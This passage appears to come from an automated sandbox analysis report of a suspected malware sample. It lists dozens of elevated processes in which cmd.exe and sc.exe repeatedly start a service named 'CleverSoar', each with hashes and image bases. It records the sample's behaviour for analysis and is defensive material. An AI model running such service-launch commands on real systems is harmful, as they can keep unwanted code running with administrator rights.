                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:35
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:36
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:37
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:38
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:39
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:40
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:41
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:42
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:43
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:44
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:45
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:46
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:47
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:48
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:49
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:50
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:51
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:52
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:53
                            Start time:23:01:54
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:54
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:55
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:56
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:57
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:58
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:59
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:60
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:61
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:62
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:63
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:64
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:65
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:66
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:67
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:68
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:69
                            Start time:23:01:55
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:70
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:71
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:73
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:74
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:75
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:76
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:77
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:78
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:79
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:80
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:81
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:82
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:83
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:84
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:85
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:86
                            Start time:23:01:56
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:87
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:88
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff72bec0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:89
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:90
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:91
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:92
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:93
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:94
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:95
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:96
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:97
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:98
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:99
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:100
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:101
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:102
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff71a860000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:103
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff734b60000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            General

                            Target ID:104
                            Start time:23:01:57
                            Start date:23/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7699e0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
